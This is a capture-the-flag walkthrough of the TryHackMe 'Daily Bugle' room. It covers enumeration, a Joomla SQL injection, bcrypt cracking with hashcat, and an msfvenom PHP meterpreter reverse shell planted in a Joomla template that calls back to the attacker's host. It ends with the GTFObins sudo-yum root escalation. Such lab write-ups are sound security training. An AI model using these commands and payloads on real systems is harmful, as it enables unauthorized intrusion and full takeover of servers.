TryHackMe Daily Bugle Made Easy - A Helpful Walkthrough with Hacking Video

5/5 - (1 vote)

Watch this video on YouTube

CHALLENGE OVERVIEW

Link: https://tryhackme.com/room/dailybugle
Difficulty: hard
Target: user/root flags
Highlight: leveraging sudo privileges on yum to gain persistent root access
Tools used: nmap, dirb, sqlmap, hashcat, gtfobins
Tags: joomla, sqli, yum

BACKGROUND

This box is another black-box-style challenge with a few extra guiding questions.

We learn that the “Daily Bugle” reports front-page news about Spiderman robbing a bank. It’s our job to hack into the system to recover the user + root flags.

The tags joomla, sqli, and yum also point us in the direction of the joomla service, SQL injection, and leveraging user permissions on the yum binary to gain root access.

ENUMERATION/RECON

NMAP

sudo nmap -A -oN nmap-results.txt <$targetIP> -O

And we’ll follow that up with an nmap script scan for more information about potential vulnerabilities:

nmap --script vuln -O -oN nmap-vuln.txt 10.10.239.203

Here is a snippet of interesting nmap results:

DIRB

dirb <$targetIP>

A snippet of interesting dirb scan results:

Notable findings include the hidden web directory (/administrator) that has a login portal. We’ll keep this in mind for later on in the hack.

SQLMAP

Cross-referencing the vulnerability discovered by our nmap vuln script scan in exploit-db, we find a downloadable text exploit file with instructions to use sqlmap.

I attempted to execute this exploit via Metasploit console but had no luck.

Plan B is to use sqlmap with the command given in the text file from exploit-db.

Our first attempt at using sqlmap errors out, so we lower the risk variable and try again.

Our new command with risk=2 completes the job, but doesn’t turn up anything interesting.

Let’s search around for a different method to exploit this vulnerability.

INITIAL FOOTHOLD

We searched for Joomla 3.7.0 exploit and found a Python script. Let’s go ahead and use the following command to start the exploit:

python3 sqli.py http://<$targetIP>/index.php?component/users/?view=login?

Success! We extracted a username and a hashed password.

Output:

Extracting users from fb9j5_users
 [$] Found user ['811', 'Super User', 'jonah', 'jonah@tryhackme.com', '$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm', '', '']

CRACK THAT HASH WITH HASHCAT

Let’s fire up hashcat and start the cracking!

A quick google search for a hash identifier website helps us determine that the hashing method used is the bcrypt/Blowfish algorithm. I looked up the id number for this hash in the help for hashcat and found it was -m 3200.

I omitted this step from the video to save time and keep people watching.

Hashcat took 51 mins, 18 secs to crack the hash using rockyou.txt for the wordlist. I also attempted to use John the Ripper to crack this hash, which was much slower than hashcat on my machine.

After saving the hash string in a file “hash”, we can start let hashcat do the work from here.

hashcat -m 3200 --show hash

Results:

Session..........: hashcat
Status...........: Cracked
Hash.Name........: bcrypt $2*$, Blowfish (Unix)
Hash.Target......: $2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p...BtZutm
Time.Started.....: Mon Jan 30 12:15:23 2023 (51 mins, 18 secs)
Time.Estimated...: Mon Jan 30 13:06:41 2023 (0 secs)
Guess.Base.......: File (/home/kalisurfer/hacking-tools/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:       15 H/s (17.05ms) @ Accel:8 Loops:8 Thr:1 Vec:16
Recovered........: 1/1 (100.00%) Digests
Progress.........: 46848/14344384 (0.33%)
Rejected.........: 0/46848 (0.00%)
Restore.Point....: 46816/14344384 (0.33%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:1016-1024
Candidates.#1....: sword -> smile4ever

Started: Mon Jan 30 12:15:18 2023
Stopped: Mon Jan 30 13:06:42 2023

The cracked hash was saved as a new file in the current directory. Now that we have our username and password we can go ahead and log in to that administrator portal we discovered earlier.

jonah:sp—--omitted—--23

Now that we are in the system as an administrator, we can modify the pages to add a revshell script. We’ll use the template for error.php and change the payload to a reverse meterpreter shell.

CREATE A METERPRETER PAYLOAD

msfvenom -p php/meterpreter_reverse_tcp LHOST=10.6.2.23 LPORT=2222 -f raw > rev.php

UPLOAD THE FILE IN TEMPLATES/ERROR.PHP

We’ll use the common text editor VIM to copy everything in the payload.php file to our clipboard using the quick and easy command:

:%y+

% – apply the next command to all lines
y – yank
+ – copy to clipboard

And then :q! to quit without saving.

CATCH A REVERSE METERPRETER SHELL

We’ll set up the meterpreter listener using the exploit (multi/handler) options, being careful to set the payload to the same payload that we used when running msfvenom to create the malicious payload (payload = php/meterpreter_reverse_tcp).

After catching the meterpreter shell, we’ll proceed to upload linpeas and run it from the regular shell within Metasploit console. The password for jjameson was discovered in plaintext.

LOGIN AS jjameson VIA SSH

Now that we presumably have a password login combo with jjameson, let’s try connecting via ssh. It works, and we are in as jjameson. Let’s grab the user flag and then continue on to privesc.

EXPLOIT

cat user.txt
27—---omitted—------2e

PRIVILEGE ESCALATION

Let’s check sudo permissions with sudo -l.

Checking GTFObins for yum, we find a pathway toward root privileges. All we have to do is cut and paste the following lines from GTFObins.

cat >$TF/y.py<<EOF
import os
import yum
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
requires_api_version='2.1'
def init_hook(conduit):
  os.execl('/bin/sh','/bin/sh')

EOF

sudo yum -c $TF/x --enableplugin=y

POST-EXPLOITATION

Now we can recover the root flag in the usual spot: /root/root.txt

ee—---------omitted—----------79

FINAL THOUGHTS

Although this box has a difficulty rating of hard, I didn’t find it to be much more complex than some of the easy-rated boxes on TryHackMe. It did take a few extra hours to complete, so maybe length is a factor that they consider when determining difficulty ratings.

PERSONAL HACKING GOALS

My immediate goal is to get into the top 1% of hackers ranked on the platform. I’m currently in the top 2% and still need to surpass roughly 10,000 hackers before I can join the ranks in the top 1%.

Jumping from a new hacker to the top 3% seemed to happen very quickly. The jump to the top 2% took considerable effort, and the next jump seems exponentially more difficult.

Benjamin Reitz

I am a freelance ethical hacker/penetration tester. I have extensive experience in penetration testing and vulnerability assessments on web apps and servers. I am also fluent in Mandarin and have 15 years of experience as an edTech integration specialist, curriculum designer, and foreign language teacher. Here’s my personal website.